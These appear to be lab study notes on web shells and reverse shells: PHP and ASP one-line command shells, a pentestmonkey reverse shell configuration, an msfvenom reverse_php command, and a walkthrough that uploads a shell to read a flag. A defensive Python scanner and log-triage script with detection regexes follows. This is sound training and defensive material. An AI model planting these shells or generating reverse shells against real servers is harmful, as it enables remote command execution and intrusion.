# Webshells

- We can find many excellent web shells online that provide useful features, like directory traversal or file transfer
- One good option for `PHP` is [phpbash](https://github.com/Arrexel/phpbash), which provides a terminal-like, semi-interactive web shell
- Additionally, [SecLists](https://github.com/danielmiessler/SecLists/tree/master/Web-Shells) provides a plethora of web shells for different frameworks and languages, which can be found in the `/usr/share/seclists/Web-Shells` directory

![[images/Pasted image 20251222201653.png]]

# Writing Custom Webshells

- We should also know how to write a simple web shell manually because we may not have access to online tools during some pentests

## php webshell

- Basic php webshell using the `system()` function

```php
<?php system($_REQUEST['cmd']); ?>
```

- With this webshell we append `&cmd=<command>` to the URL (`?cmd=<command>` when it is the first parameter), such as

```url
http://SERVER_IP:PORT/uploads/shell.php?cmd=id
```

## asp webshell

- For `.NET` web applications, we can pass the `cmd` parameter with `request('cmd')` to the `eval()` function
- Basic asp webshell

```asp
<% eval request('cmd') %>
```

- This webshell will execute the command specified in `?cmd=` and print its output

# Revshells

## Basic Revshells

- An example of a reliable revshell for `PHP` is the [pentestmonkey](https://github.com/pentestmonkey/php-reverse-shell) PHP reverse shell
- Modify lines 49 and 50 with the Kali machine's IP and port

```php
$ip = 'OUR_IP';   // CHANGE THIS
$port = OUR_PORT; // CHANGE THIS
```

- [SecLists](https://github.com/danielmiessler/SecLists/tree/master/Web-Shells) also contains revshell scripts for various languages and web frameworks
- [Online - Reverse Shell Generator - Hacker wasii](https://djiangliu.github.io/revshells/) is also useful for generating many flavors of revshells

## Custom Revshells

- We can use `msfvenom` to generate revshell scripts in many languages, and it may even attempt to bypass certain restrictions in place
- Below is an example where we generate a php revshell

```bash
msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php
```

# Exercise

- Create a basic php webshell

```bash
# The inner single quotes around cmd end the shell string early, so they are not written to the file
echo '<?php system($_REQUEST['cmd']); ?>' > shell.php
```

![[images/Pasted image 20251222202752.png]]

- Lost the quotes surrounding `cmd`, so edit the file with `nano`

![[images/Pasted image 20251222203129.png]]

- Upload webshell

![[images/Pasted image 20251222202851.png]]
![[images/Pasted image 20251222202903.png]]

- Visit `/uploads/shell.php&cmd=id`
	- 404 error

![[images/Pasted image 20251222203542.png]]

- Try replacing the `&` with a `?`
	- Only use `&` when appending a further parameter after one that is already introduced with a `?`
- Visit `/uploads/shell.php?cmd=id`
	- Test command works

![[images/Pasted image 20251222203723.png]]

- `cat` `/flag.txt` using the below URL

```url
http://94.237.123.236:54776/uploads/shell.php?cmd=cat%20/flag.txt
```
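From the defender's side, the two one-liner shells above and the `?cmd=` request shape they are driven by are exactly what an upload-directory scanner and an access-log triage rule should look for. The script below is an added example, not code from this note, HTB, phpbash, pentestmonkey or SecLists. It does two things: flags uploaded file content that matches the PHP `system($_REQUEST[...])` and ASP `eval request(...)` patterns from the note (the extra PHP function names `exec`, `shell_exec` and `passthru`, and the `$_GET`/`$_POST` variants, are my additions, not from the page), and parses Common-Log-Format access lines, splitting the query string properly so that the note's `?` versus `&` lesson is visible: `shell.php?cmd=id` carries a `cmd` parameter, while `shell.php&cmd=id` is a 404 for a file literally named `shell.php&cmd=id`. The log format, the parameter names, the file extensions and every sample line are constructed assumptions.

```python
"""Defender-side triage for the web-shell patterns shown in the note (added example)."""
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Signatures derived from the one-line shells in the note; the extra PHP function
# names and superglobals are assumptions that generalise the same idea.
WEBSHELL_SIGNATURES = {
    "php_exec_request": re.compile(
        r"\b(system|exec|shell_exec|passthru)\s*\(\s*\$_(REQUEST|GET|POST)\b", re.I),
    "php_eval_request": re.compile(r"\beval\s*\(\s*\$_(REQUEST|GET|POST)\b", re.I),
    "asp_eval_request": re.compile(r"<%\s*eval\s+request\s*\(", re.I),
}

# Constructed assumptions: where uploads live, which extensions are executable server-side,
# which parameter names and leading commands are typical of the shells above.
UPLOAD_DIR = "/uploads/"
SCRIPT_EXT_RE = re.compile(r"\.(php|phtml|asp|aspx|jsp)\b", re.I)
SHELL_PARAM_NAMES = {"cmd", "command", "exec", "c"}
SHELL_VALUE_RE = re.compile(r"^(id|whoami|cat|ls|uname|nc|bash|sh|curl|wget|python\d?)\b")

# Common Log Format: ip ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r"(?P<status>\d{3})\s")


def scan_file_content(content: str) -> List[str]:
    """Return the names of the web-shell signatures present in an uploaded file's content."""
    return [name for name, rx in WEBSHELL_SIGNATURES.items() if rx.search(content)]


def analyze_log_line(line: str) -> Optional[Dict]:
    """Parse one access-log line and report why (if at all) it looks like web-shell use."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])          # splits path from query at the first '?'
    params = parse_qs(url.query, keep_blank_values=True)  # also percent-decodes values
    suspicious: List[Tuple[str, str]] = [
        (k, v) for k, vs in params.items() for v in vs
        if k.lower() in SHELL_PARAM_NAMES or SHELL_VALUE_RE.match(v.strip())]
    reasons: List[str] = []
    if url.path.startswith(UPLOAD_DIR) and SCRIPT_EXT_RE.search(url.path):
        reasons.append("server-side script requested from upload directory")
    if suspicious:
        reasons.append("shell-like query parameter")
    if re.search(r"&\w+=", url.path):
        # No '?' was used, so '&cmd=...' became part of the path: a 404 here is the
        # fumbled first attempt from the note, still worth alerting on.
        reasons.append("query-style '&name=' inside path (missing '?')")
    return {"ip": m["ip"], "path": url.path, "status": int(m["status"]),
            "suspicious": suspicious, "reasons": reasons}


def triage(lines: List[str]) -> List[Dict]:
    """Return the parsed records that carry at least one reason to investigate."""
    return [r for r in map(analyze_log_line, lines) if r and r["reasons"]]


# Constructed sample data mirroring the exercise in the note (not real traffic).
SAMPLE_FILES = {
    "shell.php": "<?php system($_REQUEST['cmd']); ?>",
    "shell_noquotes.php": "<?php system($_REQUEST[cmd]); ?>",   # the echo mishap still matches
    "cmd.asp": "<% eval request('cmd') %>",
    "photo.php": "<?php echo 'hello'; ?>",
}
SAMPLE_LOG = [
    '10.10.14.5 - - [22/Dec/2025:20:35:42 +0000] "GET /uploads/shell.php&cmd=id HTTP/1.1" 404 196',
    '10.10.14.5 - - [22/Dec/2025:20:37:23 +0000] "GET /uploads/shell.php?cmd=id HTTP/1.1" 200 54',
    '10.10.14.5 - - [22/Dec/2025:20:38:01 +0000] "GET /uploads/shell.php?cmd=cat%20/flag.txt HTTP/1.1" 200 33',
    '10.10.14.9 - - [22/Dec/2025:20:40:10 +0000] "GET /uploads/photo.jpg HTTP/1.1" 200 48213',
]

if __name__ == "__main__":
    for name, content in SAMPLE_FILES.items():
        print(f"{name}: {scan_file_content(content) or 'clean'}")
    for rec in triage(SAMPLE_LOG):
        print(f"{rec['ip']} {rec['status']} {rec['path']} {rec['suspicious']} -> {rec['reasons']}")
```

Two design points worth noting: the file signatures match on the call shape rather than on the exact string from the note, so the version with the lost quotes still triggers; and the log rule splits on the first `?` with `urlsplit` instead of grepping for `cmd=`, so it distinguishes a real parameter from the `&cmd=` that landed in the path when the `?` was forgotten, while still flagging that 404 as a likely first attempt.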